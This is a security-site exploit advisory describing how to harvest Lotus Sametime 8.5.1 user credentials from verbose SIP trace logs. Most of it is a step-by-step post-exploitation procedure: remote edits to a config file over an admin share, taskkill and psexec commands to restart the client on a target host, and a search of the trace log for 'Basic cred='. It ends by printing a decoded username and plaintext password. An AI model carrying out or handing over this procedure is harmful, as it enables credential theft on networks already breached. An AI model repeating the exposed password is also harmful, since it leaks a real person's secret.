Lotus Sametime 8.5.1 Password Disclosure

2014.02.21
Credit: Adriano Marcio
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: n/a

# Exploit Title: Post Exploitation - Getting username and password in the Lotus Sametime 8.5.1 # Google Dork: n/a # Date: 18/02/2014 # Exploit Author: Adriano Marcio Monteiro <adrianomarciomonteiro@gmail.com> # Vendor Homepage: http://www.ibm.com/us/en/ # Software Link: http://www-01.ibm.com/support/docview.wss?uid=swg24027054 # Version: 8.5.1 # Tested on: Windows 7 SP1 x86 pt-br # CVE : Lotus Sametime is an instant messaging application that includes several features such as video conferencing, phone calls, etc. .. In case of problems the Lotus Sametime provides functionality to register and trace log (Menu: Help / Support / Show Tracker). When you enable verbose logging is possible to obtain the user and the user's password (the password is in Base64), according to the procedure below. The vulnerability is in telephony.softphone.service more specifically in Source Class.Method: com.ibm.ws.sip.stack.transport.TransportLayer sendMessage Communication with the server is done via TLS, but the local content communication log is saved in clear text and the password is in base 64. Sample log: Out Message: [172.29.1.121:62444->172.28.10.138:5081/TLS] REGISTER sip:sipserver.meudominio.com.br:5081;transport=tls SIP/2.0 Call-ID: 0.CA3.11C8340A9391D37E@172.29.1.121 CSeq: 1 REGISTER From: <sips:adriano.monteiro%40meudominio.com.br@sipserver.meudominio.com.br:5081>;tag=3996.696000502281 To: sips:adriano.monteiro%40meudominio.com.br@sipserver.meudominio.com.br:5081 Via: SIP/2.0/TLS 172.29.1.121:5061;branch=z9hG4bK-6283666955645770411 Max-Forwards: 70 Contact: sip:172.29.1.121:5061;transport=tls Expires: 0 User-Agent: Sametime-Softphone-8.5.1.20100709-0934 Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, INFO, MESSAGE, UPDATE Authorization: Basic cred="YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==" Content-Length: 0 Using a simple script you can automate the process of getting username and password, but beyond the scope of this tutorial and I will not explain this process here. Use your imagination! PoC - Proof of Concept Find the file below: \\host.alvo\c$\Users\<usuario.alvo>\Dados de Aplicativos\Lotus\Sametime\.config\rcpinstall.properties Add the following lines at the end of the file and save: com.ibm.collaboration.realtime.internal.telephony.level=FINE com.ibm.collaboration.realtime.telephony.ui.level=FINE com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST com.ibm.collaboration.realtime.telephony.softphone.level=FINER com.ibm.collaboration.realtime.telephony.core.level=FINE com.ibm.collaboration.realtime.multimedia.phonegrid.level=FINE com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE com.ibm.collaboration.realtime.telephony.core.level=FINE com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST com.ibm.collaboration.realtime.telephony.softphone.level=FINER com.ibm.collaboration.realtime.internal.telephony.level=FINE com.ibm.collaboration.realtime.telephony.ui.level=FINE com.ibm.collaboration.realtime.multimedia.level=FINE com.ibm.collaboration.realtime.internal.telephony.level=FINE com.ibm.collaboration.realtime.telephony.level=FINE com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST com.ibm.collaboration.realtime.telephony.softphone.level=FINER Restarting the process on the target host: taskkill /s host.alvo /f /im sametime.exe psexec d \\host.alvo cmd.exe /c "%ProgramFiles%\IBM\Lotus\Sametime Connect\rcp\rcplauncher.exe" In the logs folder: \\host.alvo\c$\Users\<usuario.alvo>\Dados de aplicativos\Lotus\Sametime\logs Access the file: trace-log-0.xml Search for: Basic cred= Example: <CommonBaseEvent creationTime="2014-02-18T11:44:53.249-03:00" globalInstanceId="ELac1d017d00014445744cd800001c7e" msg="Out Message: [172.29.1.125:58008-&gt;172.28.10.138:5081/TLS]&#xD;&#xA;REGISTER sip:server.meudominio.com.br:5081;transport=tls SIP/2.0&#xD;&#xA;Call-ID: 0.94.52A702A8618A2FE8@172.29.1.125&#xD;&#xA;CSeq: 1 REGISTER&#xD;&#xA;From:&lt;sips:adriano.monteiro%40meudominio.com.br@server.meudominio.com.br:5081&gt;;tag=4518.144797347828&#xD;&#xA;To: &lt;sips:adriano.monteiro%40meudominio.com.br@server.meudominio.com.br:5081&gt;&#xD;&#xA;Via: SIP/2.0/TLS 172.29.1.125:5061;branch=z9hG4bK-3811914127572726454&#xD;&#xA;Max-Forwards:70&#xD;&#xA;Contact: *&#xD;&#xA;Expires: 0&#xD;&#xA;User-Agent: Sametime-Softphone-8.5.1.20100709-0934&#xD;&#xA;Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, INFO, MESSAGE,UPDATE&#xD;&#xA; Authorization: Basic cred=&quot;YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==&quot;&#xD;&#xA;Content-Length: 0&#xD;&#xA;&#xD;&#xA;" severity="10" version="1.0.1"> The username and password found here: Authorization: Basic cred=&quot;YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==&quot; Getting Username and Password: Site: http://www.base64decode.org/ Decode: YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA== Result: adriano.monteiro@meudominio.com.br:Amor1010 Bibliography: http://pic.dhe.ibm.com/infocenter/sametime/v8r5/index.jsp?topic=%2Fcom.ibm.help.sametime.v85.doc%2Ftrouble%2Ftrbl_client_log_trace.html [end]

References:

http://www-01.ibm.com/support/docview.wss?uid=swg24027054
http://pic.dhe.ibm.com/infocenter/sametime/v8r5/index.jsp?topic=%2Fcom.ibm.help.sametime.v85.doc%2Ftrouble%2Ftrbl_client_log_trace.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top